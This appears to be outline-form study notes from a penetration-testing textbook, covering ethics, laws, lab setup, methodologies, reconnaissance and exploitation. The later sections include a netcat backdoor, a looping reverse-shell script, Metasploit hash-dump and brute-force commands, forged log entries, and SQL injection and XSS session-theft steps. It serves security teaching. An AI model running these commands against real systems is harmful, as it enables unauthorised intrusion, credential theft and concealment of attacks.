-
Ethics & Hacking
-
Getting Permission to Hack
- What is the difference between White Hat and Black Hat hackers? => “permission”
-
Code of Ethics Canons [(ISC)2]
-
■
- Protect society, the commonwealth, and the infrastructure
- Act honorably, honestly, justly, responsibly, and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
- t is really difficult to define exactly what constitutes an ethical or unethical hacker
-
Why Stay Ethical?
-
Types of computer hackers
-
Black Hat Hackers
- Those who conduct unauthorized penetration attacks against information systems
- The reason behind this activity ranges from curiosity to financial gain
- In some cases: their activities do not violate the laws of their country
-
White Hat Hackers
- Those individuals who perform security assessments within a contractual agreement
- who’s more capable—the Black Hat hacker or the White Hat hacker?
- Gray Hat Hackers
-
Ethical Standards
- Depending on your certification/location/affiliation
-
Certifications
-
(ISC)2
- Protect society, the commonwealth, and the infrastructure
- Act honorably, honestly, justly, responsibly, and legally
- Provide diligent and competent service to principals
- Advance and protect the profession
-
SANS Institute
- I will strive to know myself and be honest about my capability
- I will conduct my business in a manner that assures that the IT profession
is considered one of integrity and professionalism
- I respect privacy and confidentiality.
-
Employer
- Almost every company has an ethical standards policy
- make sure you include within the contract as part of the recipient’s obligation a clause stating that
they have read and will follow your company’s information security policies and ethics standards.
-
Educational and Institutional Organizations
- Many organizations have instituted their own ethical standards
- making membership within the organization dependent on
acceptance of these ethical standards
-
(ISSA)
- Perform all professional activities and duties in accordance with all applicable laws and the highest ethical principles
- Promote generally accepted information security current best practices and standards
- Maintain appropriate confidentiality of proprietary or otherwise sensitive information encountered in the course of professional activities
- Discharge professional responsibilities with diligence and honesty
- Refrain from any activities which might constitute a conflict of interest or otherwise damage the reputation of employers, the information security profession, or the association, and
- Not intentionally injure or impugn the professional reputation or practice of colleagues, clients, or employers
-
Internet Activities Board: unethical behavior
- Seeks to gain unauthorized access to the resources of the Internet
- Disrupts the intended use of the Internet
- Wastes resources (people, capacity, computer) through such actions
- Destroys the integrity of computer-based information, and/or
- Compromises the privacy of users
-
(IEEE)
- To accept responsibility in making decisions consistent with the safety, health and welfare of the public,
and to disclose promptly factors that might endanger the public or the environment
- To avoid real or perceived conflicts of interest whenever possible and to disclose them to affected parties when they do exist
- To be honest and realistic in stating claims or estimates based on available data
- To reject bribery in all its forms
- To improve the understanding of technology, its appropriate application, and potential consequences
- To maintain and improve our technical competence and to undertake technological tasks for others
only if qualified by training or experience, or after full disclosure of pertinent limitations
- To seek, accept, and offer honest criticism of technical work, to acknowledge and correct errors, and to credit properly the contributions of others
- To treat fairly all persons regardless of such factors as race, religion, gender, disability, age, or national origin
- To avoid injuring others, their property, reputation, or employment by false or malicious action
- To assist colleagues and coworkers in their professional development and to support them in following this code of ethics
-
(OECD)
- Collection Limitation Principle
- Data Quality Principle
- Purpose Specification Principle
- Use Limitation Principle
- Security Safeguards Principle
- Openness Principle
- Individual Participation Principle
- Accountability Principle
-
Computer Crime Laws
-
Types Of Laws
- Civil Law
- Criminal Law
- Administrative/Regulatory Law
-
Type Of Computer Crimes And Attacks
- Denial of service
- Destruction or alteration of information
- Dumpster diving
- Emanation eavesdropping
- Embezzlement
- Espionage
- Illegal content of material
- Information warfare
- Malicious code
- Masquerading
- Social engineering
- Software piracy
- Spoofing of Internet Protocol (IP) addresses
- Terrorism
- Theft of passwords
- Use of easily-accessible exploit scripts
- Network intrusions
-
U.S. Federal Law
- 1970 U.S. Fair Credit Reporting Act
- 1970 U.S. Racketeer Influenced and Corrupt Organization (RICO) Act
- 1973 U.S. Code of Fair Information Practices
- 1974 U.S. Privacy Act
- 1978 Foreign Intelligence Surveillance Act
- 1986 U.S. Computer Fraud and Abuse Act (amended 1996)
- 1986 U.S. Electronic Communications Privacy Act
- 1987 U.S. Computer Security Act
- 1991 U.S. Federal Sentencing Guidelines
- 1994 U.S. Communications Assistance for Law Enforcement Act
- 1996 U.S. Economic and Protection of Proprietary Information Act
- 1996 U.S. Kennedy-Kassebaum Health Insurance and Portability Accountability Act (amended 2000)
- 1996 Title I, Economic Espionage Act
- 1998 U.S. DMCA
- 1999 U.S. Uniform Computers Information Transactions Act
- 2000 U.S. Congress Electronic Signatures in Global and National Commerce Act
- 2001 USA PATRIOT Act
- 2002 E-Government Act, Title III, the FISMA
-
U.S. State Law
- California SB 1386, in 2003
- By 2005, 22 states had enacted similar laws
-
International Laws
-
Canada
- Criminal Code of Canada, Section 342—Unauthorized Use of Computer
- Criminal Code of Canada, Section 184—Interception of Communications
-
United Kingdom
- The Computer Misuse Act (CMA) 1990 (Chapter 18)
- The Regulation of Investigatory Powers Act 2000 (Chapter 23)
- The Anti-terrorism, Crime and Security Act 2001 (Chapter 24)
- The Data Protection Act 1998 (Chapter 29)
- The Fraud Act 2006 (Chapter 35)
- Potentially the Forgery and Counterfeiting Act 1981 (Chapter 45)
- The CMA was recently amended by the Police and Justice Act 2006 (Chapter 48)
- The Privacy and Electronic Communications
-
Australia
- Cybercrime Act 2001
- Crimes Act 1900 (NSW): Part 6, ss 308-308I
- Criminal Code Act Compilation Act 1913 (WA)
-
Malaysia
- Computer Crimes Act 1997 (Act 563)
-
Singapore
- Computer Misuse Act 1993 (Chapter 50A)
-
Venezuela
- Special Computer Crimes Act (Ley Especial de Delitos InformÆticos)
- Safe Harbor And Directive 95/46/EC
-
Getting Permission to Hack
- Confidentiality Agreement
- Company Obligations
- Contractor Obligations
- Auditing and Monitoring
- Conflict Management
-
Setting up Your Lab
-
Targets in a Pentest Lab
-
Problems with Learning to Hack
- No legitimate targets online to practice against.
- it is impossible for a person to create a pentest scenario that they can learn from
- The only way to learn is to practice against scenarios created by others
-
Real-World Scenarios
- Learning to hack using real-world servers is risky
- Production labs are expensive and availability to the labs is often limited
- unless you have the money to throw at the problem,
you will need to develop a personal lab
-
Turn-Key Scenarios
- The disadvantage to turn-key pentest scenarios is that
they only imitate real-world servers but may not do so faithfully
- Despite the disadvantages, turn-key scenarios are the
preferred method to learning how to conduct a penetration test.
-
What Is a LiveCD?
-
De-ICE
- LiveCDs are real servers that contain real-world challenges
- Available since January 2007
- The challenge is to discover what applications are misconfigured or exploitable
and to obtain unauthorized access to the root account
- A list of possible vulnerabilities
- Bad/weak passwords
- Unnecessary services
- ftp
- telnet
- rlogin
- Unpatched services
- Too much information available (contact info, and so forth)
- Poor system configuration
- Poor/no encryption methodology
- Elevated user privileges
- No Internet Protocol (IP) Security filtering
- Incorrect firewall rules (plug in and forget?)
- Clear-text passwords
- Username/password embedded in software
- No alarm monitoring
- Well-known exploits are not included in the De-ICE challenges
-
Hackerdemia
- designed to be a training platform where various
hacker tools could be used and learned
- Developed on the Slax Linux
-
Open Web Application (OWASP)
- www.owasp.org
- One of the OWASP projects is WebGoat
- categories of Web-based attack vectors within WebGoat
- Code quality
- Unvalidated parameters
- Broken access control
- Broken authentication and session management
- Cross-site scripting (XSS)
- Buffer overflows
- Injection flaws
- Insecure storage
- Denial of service (DoS)
- Insecure configuration management
- Web services
- AJAX security
-
Virtual Network Pentest Labs
-
Keeping It Simple
- Cost is usually a driver in trying to keep personal labs small and manageable
- There is also no need to maintain a large library of applications
- Unless a personal lab retains any sensitive data, a lot of security controls can be eliminated
-
Virtualization Software
- Vmware
- Backtrack
- De-Ice
-
Protecting Penetration Test Data
-
Encryption Schemas
- Data Encryption
- Data Hashing
-
Securing Pentest Systems
- Encrypt the hard drive
- Lock hard drives in a safe
- Store systems in a physically controlled room
- Perform penetration tests against the pentest systems
- Mobile Security Concerns
-
Wireless Lab Data
-
two separate labs should be created
- a wireless lab designed to practice wireless hacking
- a separate lab that can be used to conduct system attacks
-
Advanced Pentest Labs
-
Hardware Considerations
- Routers
-
Firewalls
- Firewall evasion is an advanced skill that needs practice
- Stateful and stateless firewalls present different problems as well
-
Intrusion Detection
- the most widely used IDS/IPS is the Open Source software application called Snort
- www.snort.org
- System/Intrusion
- Prevention System
-
Hardware Configuration
- De-ICE Network
- Challenges
- Network Architecture
-
Operating Systems and Applications
-
Operating Systems
- www.packetstormsecurity.org/UNIX/penetration/rootkits/
- Packet Storm links to downloadable rootkits
-
Applications
- remote-db.com
-
Analyzing Malware—Viruses and Worms
- Virtual Versus Nonvirtual Labs
-
Creating a Controlled Environment
- www.xen.org,
- Possible lab configuration using Xen hypervisor.
- all wireless communication must be disabled
-
Harvesting Malware
- connecting a honeypot directly to the Internet
- This allows Nepenthes to harvest malware directly from Internet attacks
-
Information Analysis
- tools
- Wireshark
- reverse engineering
-
Other Target Ideas
-
CTF Events
- DefCon CTF
- www.openctf.com
- www.captf.com/wiki/Main_Page
-
Web-Based Challenges
- www.hackthissite.org/
- Crackmes.de
- www.hellboundhackers.org
- www.try2hack.nl/
- Vulnerability Announcements
-
Methodologies & Frameworks
-
Information System Security Assessment Framework
- the ISSAF is a peer-reviewed process that provides in-depth
information about how to conduct a penetration test
- a professional penetration tester will use most, if not all, of the tools described in the ISSAF
- numerous examples of how tools are used within a pentest engagement
- a serious problem with the ISSAF : lack of updates
- the ISSAF document was in 2006
-
layers
- Information Gathering
- Network Mapping
- Vulnerability Identification
- Penetration
- Gaining Access and Privilege Escalation
- Enumerating Further
- Compromise Remote Users/Sites
- Maintaining Access
- Covering Tracks
-
targets
- Networks
- Hosts
- Applications
- Databases
-
phases
-
Planning and Preparation—Phase I
- the steps to exchange initial information, plan, and prepare for the test
- efore testing, a formal Assessment Agreement will be signed from both parties
- Identification of contact individuals from both side
- Opening meeting to confirm the scope, approach, and methodology
- Agree to specific test cases and escalation paths
-
Assessment—Phase II
- Network Security
- Password Security Testing
- Switch Security Assessment
- Router Security Assessment
- Firewall Security Assessment
- ntrusion Detection System Security Assessment
- Virtual Private Network Security Assessment
- Antivirus System Security Assessment and Management Strategy
- Storage Area Network Security
- Wireless Local Area Network Security Assessment
- Internet User Security
- AS 400 Security
- Lotus Notes Security
- Host Security
- Unix/Linux System Security Assessment
- Windows System Security Assessment
- Novell Netware Security Assessment
- Web Server Security Assessment
- Application Security
- Web Application Security Assessment
- SQL Injections
- Source Code Auditing
- Binary Auditing
- Database Security
- Remote enumeration of databases
- Brute-forcing databases
- Process manipulation attack
- End-to-end audit of databases
- Social Engineering
-
Reporting, Clean-up, and Destroy Artifacts—Phase III
- Reporting
- types
- verbal
- written
- the final written report
- Management summary
- Project scope
- Penetration test tools used
- Exploits used
- Date and time of the tests
- All outputs of the tools and exploits
- A list of identified vulnerabilities
- Recommendations to mitigate identified
vulnerabilities, organized into priorities
- Clean-up and Destroy Artifacts
-
Open Source Security Testing Methodology Manual
-
OSSTMM
- Introduced to the Information System Security industry in 2000
- The current release is version 3.0
- maintained by the Institute for Security and Open Methodologies
- www.isecom.org
-
Rules of Engagement
- Project Scope
- Confidentiality and Nondisclosure Assurance
- Emergency Contact Information
- Statement of Work Change Process
- Test Plan
- Test Process
- Reporting
-
Channels
- Human Security
- Physical Security
- Communications
- Telecommunications
-
Data Networks
- Network Surveying
- Enumeration
- Identification
- Access Process
- Services Identification
- Authentication
- Spoofing
- Phishing
- Resource Abuse
-
Modules
-
Phase I: Regulatory
- Posture Review
- Logistics
- Active Detection Verification
-
Phase II: Definitions
- Visibility Audit
- Access Verification
- rust Verification
- Controls Verification
-
Phase III: Information Phase
- Process Verification
- Configuration Verification
- Property Validation
- Segregation Review
- Exposure Verification
- Competitive Intelligence Scouting
-
Phase IV: Interactive Controls Test Phase
- Quarantine Verification
- Privileges Audit
- Survivability validation
- Alert and Log Review
-
Pentest Project Management
-
Quantitative, Qualitative, and Mixed Methods
-
Quantitative Analysis
- we rely on numbers—and lots of them
- Don’t always assume that the measurable data gathered are always correct.
-
Qualitative Analysis
- Quantitative risk analysis relies strictly on measurable data.
- The origin of attackf 4 ex
-
difference between threat and risk
- a threat is something that can do damage to a system
- The risk describes the likelihood and impact of the threat
- The disadvantage: opinions can be biased and influenced by external factors
- to prevent bias: use of anonymous submissions
-
Mixed Method Analysis
- The use of just one method to determine metrics is insufficient
- requires a larger amount of time and resources
- Pentest findings need to be written to match stakeholder expectations
-
Management of a Pentest
-
Introduction to PMBOK
- First published by the PMI in 1987
- attempts to standardize project management practices and information
-
project life cycle
-
Initiating Process Group
- Develop Project Charter
- Identify Stakeholders
-
Planning Process Group
- Develop Project Management Plan
- Collect Requirement
- translating business objectives into technical requirements
- Limitations should also be collected
- Define Scope
- objectives
- requirements
- boundaries
- assumptions
- deliverables of a project
- Create WBS
- Work Breakdown Structure
- actual work needs to be done to complete the project
- The WBS is not a schedule
- Sequence Activities
- Estimate Activity Resources(type & quantities)
- material
- people
- equipment
- Estimate Activity Durations
- Develop Schedule
- Estimate Costs
- the project may not be worth the cost
compared to the revenue the project will generate
- Determine Budget
- Plan Quality
- Develop Human Resource Plan
- Plan Communications
- Plan Risk Management
- Identify Risks
- Perform Qualitative Analysis
- Plan Risk Responses
- Plan Procurements
-
Executing Process Group
- Direct and Manage Project Execution
- Perform Quality Assurance
- Acquire Project Team
- Develop Project Team
- Manage Project Team
- Distribute Information
- Manage Stakeholder Expectations
- Conduct Procurements
-
Closing Process Group
- Close Project or Phase
- Close Procurements
-
Monitoring and Controlling Process Group
- Monitor and Control Project Work
- Perform Integrated Change Control
- Verify Scope
- Control Scope
- Control Schedule
- Control Costs
- Perform Quality Control
- Report Performance
- Monitor and Control Risks
- Administer Procurements
-
Project Team Members
-
Roles and Responsibilities
- Team Champion
- Project Manager
- Pentest Engineers
-
Organizational Structure
- Functional Organization
- Matrix Organization
- Projectized Organization
-
Project Management
-
Initiating Stage
-
processes
- develop project charter
- identify stakeholders
-
potential stakeholders
- Client/Customer Organization
- Project Sponsor
- Point of Contact
- Senior Management
- Target System/Network Manager
- Target System/Network Administrators
- Network Administrators
- Network Defense Administrators
- Penetration Test Team
- Project Manager
- Functional Manager
- Senior Management
- Pentest Engineers
- Procurement Department
- Government Agencies
- Local law Enforcement
- Local Law Enforcement Investigators
- Federal Law Enforcement
- Third-Party Groups
- Internet Service Providers
- Subject-Matter Experts/Consultants
- Planning Stage
- Executing Stage
- Monitoring and Controlling
-
Closing Stage
- Formal Project Review
- Effort Evaluation
- Identification of New Projects
-
Future Project Priority Identification
- Overall security risk to the client
- Cost of each project
- Financial gain of each project
- Length of time needed for each project
- Skills needed to successfully complete each project
- Staff/resource availability
- Project sponsor/requestor
-
Solo Pentesting
- Initiating Stage
-
Planning Process Stage
- Collect Requirements
- Define Scope
- Estimate Activity Durations
- Develop Schedule
- Plan Quality
- Plan Communications
- Identify Risks
- Plan Risk Responses
- Plan Procurements
-
Executing Stage
- Direct and Manage Project Execution
- Manage Stakeholder Expectations
-
Closing Stage
- ensures that all the reporting is completed
- concludes the contract
-
Monitoring and Controlling
- Monitor and Control Project Work
- Verify Scope
- Control Scope
- Perform Quality Control
- Monitor and Control Risks
-
Archiving Data
-
Should You Keep Data?
-
two schools
- keep everything
- keep nothing
- Legal Issues
-
E-mail
- some e-mails will contain sensitive data that should be protected
- roper encryption and access control mechanisms must be in place
- Findings and Reports
-
Securing Documentation
- Access Controls
- Archival Methods
- Archival Locations
- Destruction Policies
-
Cleaning up Your Lab
-
Archiving Lab Data
- Proof of Concepts
- Malware Analysis
-
Creating and Using System Images
- License Issues
- Virtual Machines
- “Ghost” Images
-
Creating a “Clean Shop”
- Sanitization Methods Using Hashes
- Change Management Controls
-
Planning for Your Next Pentest
-
Risk Management Register
- Creating a Risk Management Register
- Prioritization of Risks and Responses
-
Knowledge Database
- Creating a Knowledge Database
- Sanitization of Findings
- Project Management
-
Knowledge Database
- Points of contacts internal to the company
- Points of contacts of client organizations
- Resource vendors
- List of subject-matter experts
- List of past team members and current contact information
- Contracts
- Statements of work
- Project templates
-
After-Action Review
-
Project Assessments
- Scheduling issues (too little time, too much time, and so forth)
- Resource availability
- Risk management
- Project scope issues (too broad, too narrow, and so forth)
- Communication issues
-
Team Assessments
- Technical strengths
- Technical weaknesses
- Level of effort within each component of the project
- Team training ideas
- Time management skills
- Obstacles that prevented effective teamwork
- Overall opinion on productivity of the team
- Training Proposals
-
Information Gathering
-
Passive Information Gathering
-
Web Presence
-
Tools
- Web browser
- Dogpile.com
- Alexa.org
- Archive.org
- Shodanhq.com
- dig
- nslookup
-
Informations
- Web site address(es)
- Web server type
- Server locations
- Dates, including “date last modified”
- Web links—both internally and externally
- Web server directory tree
- Technologies used (software/hardware)
- Encryption standards
- Web-enabled languages
- Form fields (including hidden fields)
- Form variables
- Method of form postings
- Company contact information
- Meta tags
- Any comments within Web pages
- E-commerce capabilities
- Services and products offered
-
Exercice: gathering info about Nmap
- Step 1 : google "Nmap"
- Results
- Nmap.org
- Insecure.org
- Sectools.org
- Step 2 : Alexa "Nmap.org"
- Alexa.org believes => Nmap.org and Insecure.org are related
- Nmap.org permits subdomains
- scanme.Nmap.org.
- Step 3: nmap.org itself
- Archive.org
- allows to see how the Website has changed over the years
- it often has information no longer available through Google
- Archive.org does not provide the latest 6 months of archive
- Turn Off All Access to Target System
- Netcraft.com
- Google
- site:cgi.Insecure.org
-
Corporate Data
- location
- employee information
- network information
-
Google maps
- adjoining buildings
- buildings across
- the street
- entrances
- window locations
- ingress/egress routes
- lighting
- cameras
- access controls
- Google Earth
- Bing maps
-
Whois and DNS
- Whois
-
dig
- query nameservers
- dig ns nmap.org
- nslookup
-
Additional Internet Resources
- http://freenews.maxbaud.net
-
investigated to determine if it has
been listed in the SPAM database
- it might indicate that the mail server had
been compromised in the past
- www.dnsbl.info
- job sites
-
Active Information Gathering
-
DNS Interrogation
- version number of the Berkeley Internet Name Domain (BIND)
- ns1.titan.net
-
E-mail Accounts
- Goal: create a list of users that reside on the system
- helpful in any brute-force attack & login attempt
- social engineering purposes
- Perimeter Network Identification
-
Network Surveying
- Goal: identify how many systems reside within
the network and their associated IP address
-
Use Nmap
- nmap -sF 192.168.1.1-255
- Use netdiscover
-
Vulnerability Identification
-
Port Scanning
-
Target Verification
-
Active Scans
- Ping
- Msgs used to determine if the target is alive
- Echo Request
- Echo Replay
- initial request: set the Type field to “8” & send it
- If target system is alive => Return a datagram using the value of "0"
- Results are not always accurate => protection against random scans
- nmap -sP 192.168.1.123
- ICMP echo request
- TCP ACK packet
- nmap -sP 192.168.1.0/24
- Passive Scans
-
UDP Scanning
-
disadvantages
- slow when compared to TCP scans
- most exploitable applications use TCP
-
possible results returned (UDP scan)
- Open
- the existence of an active UDP port
- Open/filtered
- No response was received
- Closed
- “port unreachable”
- Filtered
- If OPEN or CLOSED => the target is ALIVE
- If OPEN/FILTRED or FILTRED => IPS or Firewall is intercepting => We need to adjust our attack
- UDP scans are not something most firewall administrators think about
-
TCP Scanning
-
TCP Connect Scan (-sT)
- most reliable method of determining port activity
- complete three-way TCP handshake
- may be noticed by IDSes
- advantage: we will know for certain whether an
application is truly present or not
-
TCP SYN Stealth Scan (-sS)
- creates a half-open connection
- this might help against IDSes
- advantage: speed
-
Perimeter Avoidance Scanning
-
ACK Scan (-sA)
- send an ACK to the target system
- firewall will assume a communication channel that already exists
- Null Scan Attack (-sN)
- FIN (-sF) and Xmas Tree (-sX) Scans
-
System Identification
-
Active OS Fingerprinting
- Nmap can scan a system and identify the OS
- nmap -O 192.168.1.100
- Another tool we can use is xprobe2
- xprobe2 -p tcp:80:open 192.168.1.100
-
Passive OS Fingerprinting
- equires a lot of patience
- Objective: Capture TCP packets stealthily
- p0f Scan
- ARP poisoning attack
-
Services Identification
-
Banner Grabbing
- Launch Nmap using the -sV => grab banner information from apps
- Banner grabbing using Telnet
-
Enumerating Unknown Services
- Connect to the ports manually and see what type of information is returned
- After we connect(Using NetCat), we can send random data
- nc pWnOS 1000
- Connecting to target using smbclient.
-
Vulnerability Identification
- http://nvd.nist.gov/
- If we were simply conducting a risk assessment without conducting a penetration test, this is where we would probably stop
-
Vulnerability Exploitation
-
Introduction
- In this chap, we'll allow automated tools to do the same thing(chap 7) for us
- Without understanding how to gather the application and OS version information yourself, you cannot accurately understand how automated tools gather the same information
- if we want to call ourselves professionals, that we cannot simply allow our tools to do our work for us
-
four steps
- Find proof of concept code/tool
-
Test proof of concept code/tool
- testing the exploit against a test server first
- we really cannot know what will happen when we launch the exploit, unless we examine the code first, or test it within a test environment
- an exploit can have different results, including crashing the target and losing all data and functionality
- Write your own proof of concept code/tool
- Use proof of concept code/tool against target
-
Automated Tools
-
The top 10 vulnerability scanners
- Nessus (open source/commercial)
- OpenVAS (open source)
- Core Impact (commercial)
- Nexpose (commercial)
- GFI LanGuard (commercial)
- QualysGuard (commercial)
- MBSA (open source)
- Retina (commercial)
- Secunia PSI (open source)
- Nipper (commercial)
-
Vulnerability exploitation tools
- Metasploit (open source/commercial)
- Core Impact (commercial)
- sqlmap (open source)
- Canvas (commercial)
- Netsparker (commercial)
-
Nmap Scripts
- usr/share/nmap/scripts
- To invoke these scripts, we need to use the -A flag
- nmap -A 10.0.3.125
-
Default Login Scans
- Frequent issue: The use of default or weak passwords on applications
- There are multiple tools we can use: Medusa, Hydra...
- #> medusa –h <targetIP> -u root -p password -e ns -O mysql.medusa.out –M mysql
- OpenVAS
-
JBroFuzz
- Fuzzing is a process where random data are passed to an
application in the hopes that an anomaly will be detected
- Fuzzing can take quite a while to complete
- We can use a fuzzer whenever we discover a place to insert user-supplied data in an application
-
Metasploit
-
FTP
- use auxiliary/scanner/ftp/anonymous
- auxiliary/scanner/ftp/ftp_login
-
Simple Mail Transfer Protocol
- can be used to identify usernames on a target system or within the organization
- User enumeration via SMTP
- use auxiliary/scanner/smtp/smtp_enum
- show options
- set RHOST 192.168.1.123
- run
- Once we have this information, we can attempt to find passwords for each user
- launch bogus e-mails as the root user (Social Engineering)
-
Server Message Block
- SMB user enumeration
- use auxiliary/scanner/smb/smb_enumshares
- Brute-force of “msfadmin” password.
- Creating link to remote file share.
- use auxiliary/admin/smb/samba_symlink_traversal
- show options
- set SMESHARE tmp
- exploit
- Logging onto the remote system’s/root directory.
-
Network File Shares
- We can scan for Network File Shares (NFS)
- using the “nsfmount” module in Metasploit
- use auxiliary/scanner/nfs/nfsmount
- show options
- set RHOTS
- run
-
MySQL
- auxiliary/scanner/mysql/mysql_login module
- grab the hashes stored in the MySQL
- use auxiliary/scanner/mysql/mysql_hashdump
- show options
- set RHOST
- run
-
PostgreSQL
- postgres_login module
- auxiliary/scanner/postgres/postgres_schemadump
- Metasploit also has modules for Oracle as well
-
VNC
- use auxiliary/scanner/vnc/vnc_none_auth
- show options
- st RHOST
- set USERNAME root
- run
- Never trust a tool and use more than one for each task
-
Exploit Code
-
Internet Sites
- the repository of exploits: www.explot-db.com
- So, which exploits should we attempt? All of them!
-
Local System Attacks
-
System Exploitation
-
Internal Vulnerabilities
- only possible if local access is somehow obtained first
- an effective method of elevating privileges on a target system
-
Sensitive Data
- We may not always obtain administrative permissions
- gather sensitive information that shouldn’t be available to unauthorized users
- Ex: We successfully downloaded the / etc/shadow
- Once we have access to a command prompt, we need to take a bit of time and really explore the server for useful data
-
Meterpreter
- Once we have Meterpreter running, we can explore the exploited system.
- It is possible to “jump” from the current user/process into one that is more elevated
-
Shells and Reverse Shells
-
Netcat Shell
- To use netcat as a backdoor we need to have a way to direct all
communication through netcat into a shell or command prompt
- Nmap scan against the Hackerdemia => nmap 192.168.1.123
- The port we will look at is port 1337
- When a connection is made, netcat will execute
the bash shell, allowing us to interact with the system
- Permissions are transferred whenever a process is launched
- the bash shell will inherit the same permissions
of whoever started the netcat process => system itself.
-
nc 192.168.1.123 1337
- whomi => root
- pwd => /
- ifconfig => eth0 , lo ...
- uname -a => Linux slax 2.6.16
- We now have a backdoor that will be accessible as long as the startup script is running.
-
Netcat Reverse Shell
- A reverse shell will often prevent firewalls from severing our connection
-
Reverse shell using netcat.
- #!/bin/sh
- while true : do
- nc 192.168.1.10 1337 -e /bin/sh
- done
- nc -l -p 1337
- Because we are root on the attack system, it really doesn’t matter which port we use
- everything we send to the target system will be in cleartext =>
netcat does not encrypt the communication stream
- If we create a backdoor in a penetration test, we will need to be able to remove them later
-
Encrypted Tunnels
- An SSH tunnel will allow us to push malware and additional exploits onto the victim system without being detected
- ddition of iptables rules to block any incoming traffic from the attack system
-
Adding a Host Firewall (Optional)
-
Setting Up the SSH Reverse Shell
- nc 192.168.1.100 22
- SSH 1.99-OpenSSH_4.3
- root
- protocol mismatch
-
Setting Up Public/Private Keys
- first create a public/private rsa key pair with an empty
password, which allows us to automate our connection
- create a netcat listener that will push the id_rsa file to a connecting system
-
append the id_rsa.pub file to the authorized_keys file on our attack server
- cat id_rsa.pub >> /root/.ssh/authorized_keys
- Setup on attack server for SSH connection => ssh-keygen -t rsa
- connect an SSH client to the local listening port: ssh -p 44444 localhost
- Launch the Encrypted Reverse Shell
-
Other Encryption and Tunnel Methods
-
Cryptcat
- twofish encryption algorithm
- both systems must possess the same cipher key
- http://cryptcat.sourceforge.net
-
Matahari
- written in Python
- uses the ARC4 encryption algorithm
- ARC4 is now a deprecated method of encryption but is still useful in a penetration test environment
- http://matahari.sourceforge.net
-
Proxytunnel
- can create an OpenSSH tunnel to our attack system
- shell access to the victim server
- http://proxytunnel.sourceforge.net
-
Socat
- can encrypt the traffic using OpenSSL
- www.dest-unreach.org/socat/
-
Stunnel
- an SSL wrapper
- https://stunnel.org/
-
Privilege Escalation
-
Password Attacks
-
Remote Password Attacks
- Before we begin, we need to create and gather dictionaries
- Create additional dictionaries according to our current target
-
De-ICE 1.100
- we see a list of different e-mail addresses
- we can use these e-mails to build a list
- well. We may be able to avoid adding variations if we already know the pattern used within an organization to assign usernames to employees
- we have a partial list of potential login names.
- root
- adamsa
- banterb
- ...
- we conduct an Nmap scan against the target system
- Weak password for username “bbanter.” (Hydra)
- “bbanter” has very limited access to the system
- othing useful on the system
- attack against the “aadams”
- we will be using the “rockyou.txt” file available at SkullSecurity.org
- Successful dictionary attack
-
Local Password Attacks
- dependent on our ability to capture hashes from a compromised system
- Hashes from Metasploitable
- we launch JTR against the hash file using the rockyou.txt dictionary
- “msfadmin” username has a password of “msfadmin”
- Dictionary Attacks
-
Network Packet Sniffing
- MITM attack using Ettercap
- The MITM attack is totally independent from the sniffing
- The aim of the attack is to hijack packets and redirect them to ettercap
- You can choose the MITM attack that you prefer and also combine some of them to perform different attacks at the same time
-
methods in which network data can be captured
- Domain name system (DNS)—Cache poisoning
- DNS forgery
- User interface (UI) redressing
- Border Gateway Protocol (BGP) hijacking
- Port Stealing
- Dynamic Host Configuration Protocol (DHCP) spoofing
- Internet Control Message Protocol (ICMP) redirection
- MITM
-
Social Engineering
-
attacks
- Shoulder surfing
- Physical access to workstations
- Masquerading as a user
- Masquerading as a monitoring staff
- Dumpster diving
- Handling (finding) sensitive information
- Handling (finding) sensitive information
- Reverse social engineering
-
Baiting
- uses computer media to entice a victim into installing malware
- Ex: leave a CD-ROM disk in a public place
- Rely on natural human curiosity when presented with an unknown
-
Phishing
- fake e-mails, which request a user to connect to an illegitimate site
- Some phishing attacks target victims through the phone
-
Pretexting
- inventing a scenario to convince victims to divulge information they should not divulge
-
Manipulating Log Data
-
User Login
-
Modifying the log file and matching time stamps.
- root@slax:~# more /var/log/secure
- root@slax:~# date
- Wed Apr 29 11:26:30 GMT 2009
- root@slax:~# echo ‘Apr 29 11:28:08 (none) su[31337]: + vc/1 root-root’ >> /var/log/secure
- root@slax:~# date
- Wed Apr 29 11:28:08 GMT 2009
-
Application Logs
- Take a look at the /var/log/messages file
-
Hiding Files
-
Hiding Files in Plain Sight
- we need to camouflage our script
- change the name of the file
- Hiding Files Using the File System
-
Hiding Files in Windows
- By adding the hidden attribute to virus.exe
- any application launched in Microsoft Windows can be detected by looking at the processes running on the system
-
Two options
- Delete the entire log
- Modify the content
-
Two types of logs
- System generated
- Application generated
-
Targeting Support Systes
-
Database Attacks
- first step : Nmap scan, using the “-A” flag
- take a look at the available exploits and modules available on Metasploit
- First thing to check: weak passwords
- We can use our own dictionaries to conduct a brute-force attack
- Network Shares
-
Targeting The Network
-
Wireless Network Protocols
-
Wi-Fi Protected Access Attack
- Set in monitor mode
-
airodump-ng
- Basic Service Set Identifier (BSSID)
- Extended Service Set Identifier
- Station (client) MAC addresses:
-
aireplay-ng
- deauthenticate connected clients from a target access point, requiring the clients to reconnect and reauthenticate using the WPA handshake
- Dictionary attack against the encrypted key
-
aircrack-ng
- Decipher our captured WPA encrypted key
-
WEP Attack
-
Crackin' WEP involves capturing all IVs between the client and the AP
- IVs are blocks of bits that are used to differentiate users on the wireless network
- IVs eliminate the need for users to constantly reauthenticate
- Eventually, an authenticated user will reuse an IV because the number of bits used is limited
- If enough IVs are captured, it is possible to decipher
- WEP encryption can be broken regardless of the encryption key complexity
-
Simple Network Management Protocol
- UDP scan
- Brute-force attack of SNMP community strings.
- “snmpenum.pl” script to dump data from the target system
- Modifying hostname using “snmpset.”
-
Web Apps Attack Techniques
-
SQL Injection
- technique used for manipulating Web services that send SQL queries to a RDBMS to alter, insert, or delete data in a database
- SQL injections work more often than they should
-
SELECT * FROM user_data WHERE last_name = ‘Tom’ OR ‘1’ = ‘1’
- display the user_data associated with the user TOM
- give us everything because 1 = 1
- SQL injections are perfect examples of weaknesses in Integrity Controls
-
Cross-Site Scripting
- Gather session information of a victim user, Ex: administrator
- t is sometimes possible to conduct a replay attack—using the session information
- Injecting “Alert” script into database
- Once saved, an alert window will appear with the session ID information
- After we have successfully injected our script we wait until someone else visits Tom’s information
- use JavaScript or another programming language that imbeds into HTML to send the session ID
-
Web Application Vulnerabilities
-
How
- Identify applications running on ports,usually port 80 or 443 for Web app
- Find version information (if possible)
- Look for exploits on the Internet.
- Run the exploits against the target application
-
Top 10 attack vectors
- Injection (including SQL injections)
- Broken Authentication and Session Management
- Insecure Direct Object References
- Security Misconfiguration
- Sensitive Data Exposure
- Missing Function Level Access Control
